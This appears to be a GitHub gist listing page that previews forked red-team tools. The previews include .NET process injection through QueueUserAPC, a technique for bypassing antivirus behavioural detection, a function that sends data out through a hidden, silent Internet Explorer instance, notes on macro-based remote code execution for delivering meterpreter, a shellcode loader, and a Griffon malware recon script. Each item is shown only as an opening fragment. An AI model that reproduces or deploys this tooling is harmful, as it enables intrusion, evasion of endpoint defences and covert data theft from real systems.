sunnyneo’s gists

sunnyneo / DInjectQueuerAPC.cs

Created February 14, 2021 07:37 — forked from rvrsh3ll/DInjectQueuerAPC.cs

.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript

	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace DinjectorWithQUserAPC
	{


	public class Program

sunnyneo / divide_and_conquer.c

Created January 20, 2021 07:48 — forked from theevilbit/divide_and_conquer.c

Divide and Conquer NextGen AV bypass

	/*
	This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
	*/

	#include <stdio.h>
	#include <tchar.h>

	#include <windows.h>
	#include "Commctrl.h"
	#include <string>

sunnyneo / ie_com.cs

Created January 6, 2021 13:55 — forked from leoloobeek/ie_com.cs

InternetExplorer.Application PoC's

	// sample function that takes in a destination server, POST data, and custom HTTP request headers
	private string SendData(string dst, byte[] postData, string customHeaders)
	{
	Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
	object IE = Activator.CreateInstance(com_type);

	object[] falseArr = new object[] { false };
	object[] trueArr = new object[] { true };
	com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
	com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

sunnyneo / Various-Macro-Based-RCEs.md

Created December 28, 2020 07:38 — forked from mgeeky/Various-Macro-Based-RCEs.md

Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload

sunnyneo / LoadRunner.asm

Created December 24, 2020 07:47

LoadRunner - Simple Shellcode Loader from JS

	; Copyright (c) 2009-2014, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
	; and Peter Ferrie <peter.ferrie@gmail.com>
	; Project homepage: http://code.google.com/p/win-exec-calc-shellcode/
	; All rights reserved. See COPYRIGHT.txt for details.

	; Windows x64 null-free shellcode that executes calc.exe.
	; Works in any x64 application for Windows 5.0-6.3 all service packs.

	;
	; nasm -f win64 LoadRunner.asm

sunnyneo / hookdetector.vba

Created December 9, 2020 07:01 — forked from X-C3LL/hookdetector.vba

VBA Macro to detect EDR Hooks (It's just a PoC)

	Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
	Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
	Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

	'VBA Macro that detects hooks made by EDRs
	'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


	Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
	Dim address As LongPtr

sunnyneo / theircorp.tlb

Created November 22, 2020 08:08 — forked from djhohnstein/theircorp.tlb

TypeLib - Details. .tlb

	https://ghostbin.com/paste/4x325
	<o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o><o>



	* * * * * * * * * * * * * * * * * * * * *
	* *
	* *
	* The Unofficial *
	* *

sunnyneo / gadget2jscriptQueueAPCInject.cs

Created November 3, 2020 15:45 — forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs

	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Reflection;
	using System.Runtime.InteropServices;
	using System.Net;
	using System.IO.Compression;

	public class Payload
	{

sunnyneo / mscorlib_load_assembly.vba

Created November 3, 2020 05:08 — forked from monoxgas/mscorlib_load_assembly.vba

VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown

	' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

	Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
	Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
	Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

	#If Win64 Then
	Const LS As LongPtr = 8&
	#Else
	Const LS As LongPtr = 4&

sunnyneo / gist:c4635f96ba934cbfbb556eda0529ad48

Created October 25, 2020 18:29 — forked from kirk-sayre-work/gist:1a9476e7708ed650508f9fb5adfbad9d

Griffon Recon Tester Script

	'' Griffon main actions start here.

	Set file_system_object = CreateObject("Scripting.FileSystemObject")
	temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName

	' Start the detailed recon.
	recon_info_str = get_network_adapter_info
	network_info_str = ""
	recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
	recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"